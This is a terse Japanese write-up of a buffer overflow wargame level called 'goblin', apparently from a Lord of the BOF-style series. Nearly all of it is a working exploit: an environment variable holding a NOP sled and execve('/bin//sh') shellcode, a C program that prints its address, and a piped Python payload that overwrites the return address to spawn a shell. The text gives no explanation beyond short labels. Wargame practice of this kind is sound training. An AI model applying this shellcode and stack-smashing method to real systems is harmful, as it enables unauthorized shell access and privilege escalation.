cobolt -> goblin
0
coboltとは入力方式だけ違う
説明なしに攻撃
環境変数を作る
export SHL=`python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`アドレスを探す
#include <stdio.h>
#include <stdlib.h>
int main() {
printf("%p\n", getenv("SHL"));
return 0;
}今度もアドレスは0xbfffff6e
攻撃コマンド
(python -c 'print "A"*20+"\x6e\xff\xff\xbf"'; cat) | ./goblin
クリア
